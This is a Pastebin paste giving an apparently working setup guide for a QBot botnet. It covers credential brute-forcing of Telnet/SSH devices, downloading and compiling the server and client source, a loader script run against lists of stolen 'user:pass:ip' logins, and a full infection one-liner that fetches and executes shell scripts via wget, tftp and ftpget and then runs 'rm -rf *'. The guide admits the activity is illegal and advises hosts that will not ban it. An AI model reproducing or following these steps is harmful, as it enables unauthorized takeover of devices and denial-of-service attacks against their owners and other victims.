API tools faq
paste
Advertisement
Guest User

QBot Setup Guide

a guest
Jan 27th, 2019
3,840
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.41 KB | None | 0 0
raw download clone embed print report
  1. QBot Setup Guide
  2.  
  3.  
  4. Let’s start with some terminology.
  5.  
  6. ServerSide = The botnet server application that you connect to for sending attacks and allows your bots to join the net.
  7.  
  8. ClientSide = The way your bots communicate with the ServerSide and send attacks.
  9.  
  10. Scanning = Sending requests to connect to ips and see if they are running TELNET(port 23) or SSH(port 22) so that you can have an idea of what is running on the bots and if you can infect them.
  11.  
  12. Bruting = A dictionary based attack, trying a few different username and password combinations on every ip in a range or ip list that is known to be running TELNET or SSH. Generally bruteforce programs/scripts will let you send a command(your botnet infect line)to the bot if a successful login is made so you may not need to load. For now...
  13.  
  14. Loading = This is the last part of infecting bots. You have your list of “bruted” IP address paired with the user name and password associated with it. You run a loading script which will connect your server to the bot and send the payload to join the botnet and send attacks.
  15.  
  16. List = A file containing the bots usernames,passwords,and IP addresses. This is not to be confused with a “range list” which is only a file containing potentially vulnerable devices(bots) that you will need to scan and then brute force to get access to the bot and add your client.
  17.  
  18.  
  19.  
  20. Now that we know what is what. Let’s find out what we need to get the botnet up and running.
  21.  
  22. 2 Linux VPS(centOS), Putty,basic Linux command line knowledge, a Server.c(Serverside), a client.c(client side), a cross compiler for the client side(cc7.py), a bot loader for SSH/TELNET and some lists or ip ranges to scan.
  23.  
  24. 1 virtual private server(VPS) that you can use to host the ServerSide and run all the commands on (except for loading.) it should have at least 1 cpu,2G ram and 10GB of storage. It’s also important to note that this activity is illegal and you’ll need to find a VPS provider that will not ban you for this kind of activity.
  25.  
  26. 1 more VPS for Scanning,Bruting, and Loading. This is very important to the botnet as it allows the bots to connect to the ServerSide as well as finding new bots. This is also a server you will want to not have banned so pick a VPS provider accordingly.
  27.  
  28.  
  29. Now let’s install those things.
  30.  
  31.  
  32.  
  33. wget -O server.c https://pastebin.com/tcVMVG4f
  34.  
  35. wget -O client.c https://raw.githubusercontent.com/geniosa/qbot/master/client.c
  36.  
  37. wget -O cc7.py https://raw.githubusercontent.com/geniosa/qbot/master/cc7.py.txt
  38.  
  39. wget -O load.py https://pastebin.com/raw/dTfXeckv
  40.  
  41.  
  42. Step Number 1.
  43. Make Sure Everything Is Updated.
  44.  
  45. Run This Command : yum install python-paramiko nano screen gcc perl wget libzip unzip
  46.  
  47. Step Number 2.
  48. Compiling The serverside
  49.  
  50. Command: gcc server.c -o server -pthread
  51.  
  52. Step Number 3.
  53. Compile The Client Side.
  54.  
  55. Run This Command : python cc7.py client.c 127.0.0.1
  56.  
  57. Step Number 4
  58. Screen The ServerSide. [Your Screen Will Go Blank, Do Step Five Before This Step]
  59.  
  60. Run This Command : screen ./server 23 1000 1337
  61.  
  62.  
  63. [Login To Your QBot After Screening the server side. Use Putty And Connect with “Raw” And Enter Your port (the one you picked when you ran screen) And once connected use your login from step 5.]
  64.  
  65. Step 5.
  66. Making A Login.
  67.  
  68. Run This Command : echo user pass>>login.txt
  69.  
  70. So now your putty info is:
  71.  
  72. 127.0.0.1 1337 user pass
  73. Server IP | ServerSide Port | User Pass
  74. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://127.0.0.1/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 127.0.0.1 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 127.0.0.1; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 127.0.0.1 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
  75.  
  76.  
  77. Step 6. Now that your server side and client is setup you need to load your bots.
  78.  
  79. You’ll use the “load.py” file for this, use "nano load.py" and where it says cmd="" add your wget line between the double quotes and then do CTRL-X and then enter to save the change. Now make a .txt file with the ssh list containing the bots, in this format "user:pass:ip". Then run the command: "python load.py ssh.txt" and your bots will be loaded to your net. (This depends on how good the list is.)
  80.  
  81.  
  82. Step 7.
  83.  
  84. Now your server is up, clients are compiled, server side is screened, bots are loaded, you’re ready to send attacks!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!